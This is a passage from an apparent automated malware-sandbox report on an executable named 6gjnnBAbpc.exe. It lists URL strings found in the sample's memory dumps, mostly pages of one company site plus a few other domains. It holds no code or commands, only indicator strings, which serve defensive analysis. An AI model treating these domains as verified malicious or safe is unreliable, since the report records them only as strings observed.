                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411274657.0000000008DD2000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411447471.0000000008DE7000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.11tochi.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411274657.0000000008DD2000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411447471.0000000008DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.11tochi.net/gp2vz4XQw/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.GPSENKE.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314457404.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D77000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aevga.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.afternic.com:443/forsale/www.findbc.com?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_cam
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aiag.org/about
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.325578885.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.c9dd.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/branchen-know-how/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.488520176.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comments/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/datenschutz/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/download/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/en/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/es/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.488520176.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.488520176.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/home/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/impressum/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kunden-login/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/leistungen/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/leistungen/central-warehouse/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/leistungen/intelligent-sourcing/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/pt-pt/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ru/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmen/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmen/karriere/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmen/ueber-uns/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/bg-stripes.png);background-repeat:repeat;backgrou
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/favicon-comsit.ico
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/logo-COM-SIT.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn-150x26.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn-50x9.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 